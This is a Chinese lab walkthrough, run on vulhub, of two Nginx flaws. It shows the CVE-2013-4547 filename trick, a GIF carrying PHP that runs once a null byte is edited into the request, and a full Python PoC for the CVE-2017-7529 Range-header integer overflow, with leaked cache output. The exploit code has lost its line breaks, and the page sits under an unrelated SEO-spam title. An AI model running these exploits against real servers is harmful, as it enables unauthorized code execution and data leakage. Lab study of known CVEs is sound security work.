湛江知名网站建设电话_装修效果图制作_全网络品牌推广_产品软文范例大全

vulhub起靶场

Nginx 文件名逻辑漏洞（CVE-2013-4547）

上传1.gif，内容为

<?php phpinfo();?>

http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php访问文件位置，这里0x00要改包

先访问/uploadfiles/1.gif a.php（a是用来占位置的）然后在

这里把a的61改成00，然后放包

解析成功

Nginx越界读取缓存漏洞（CVE-2017-7529）

docker起环境直接拿poc打

import requests
import time
import urllib3def cve20177529():try:# 构造请求头headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"}url = input('请输入目标URL:')# 获取正常响应的返回长度# verify=False防止ssl证书校验，allow_redirects=False，防止跳转导致误报的出现r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)url_len = len(r1.content)# 将数据长度加长，大于返回的正常长度addnum = 200final_len = url_len + addnum# 构造Range请求头，并加进headers中# headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000-final_len)headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)}# 用构造的新的headers发送请求包,并输出结果r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)text = r2.textcode = r2.status_codeif ('ETag') in text and code == 206:print('存在Nginx整数溢出漏洞（CVE-2017-7529）,已输出到cve20177529_log.txt')# 将结果输出到文本上with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:f.write('存在Nginx整数溢出漏洞（CVE-2017-7529）-------------' + time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())) + '-------------\n' + r2.text)f.closeelse:print('未检测到漏洞')# 将结果输出到文本上with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:f.write('未检测到漏洞-------------' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + '-------------\n' + r2.text)f.closeexcept Exception as result:print(result)if __name__ == "__main__":urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)cve20177529()

存在Nginx整数溢出漏洞（CVE-2017-7529）-------------2025-04-08 19:26:35---------------00000000000000000002Content-Type: text/html; charset=utf-8Content-Range: bytes -200-611/612, 08 Apr 2025 11:18:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 612Last-Modified: Tue, 27 Jun 2017 13:40:50 GMTConnection: closeETag: "59526062-264"Accept-Ranges: bytes<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>body {width: 35em;margin: 0 auto;font-family: Tahoma, Verdana, Arial, sans-serif;}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p><p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p><p><em>Thank you for using nginx.</em></p>
</body>
</html>--00000000000000000002Content-Type: text/html; charset=utf-8Content-Range: bytes -9223372036854774384-611/612

得到敏感信息